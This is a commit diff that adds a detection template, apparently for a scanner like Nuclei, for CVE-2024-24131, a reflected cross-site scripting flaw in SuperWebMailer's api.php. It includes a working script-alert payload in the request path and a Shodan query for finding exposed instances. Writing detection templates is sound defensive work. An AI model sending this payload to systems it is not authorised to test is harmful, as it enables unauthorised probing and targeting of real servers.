Create CVE-2024-24131.yaml
parent
27b3f7ed92
commit
9cd8ac2cfa
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2024-24131
|
||||
|
||||
info:
|
||||
name: SuperWebMailer 9.31.0.01799 - Reflected Cross-Site Scripting
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-24131
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-24131
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.15655
|
||||
cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: superwebmailer
|
||||
product: superwebmailer
|
||||
shodan-query: title:"SuperWebMailer"
|
||||
tags: cve,cve2024,superwebmailer,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
- "SuperWebMailerAPI"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue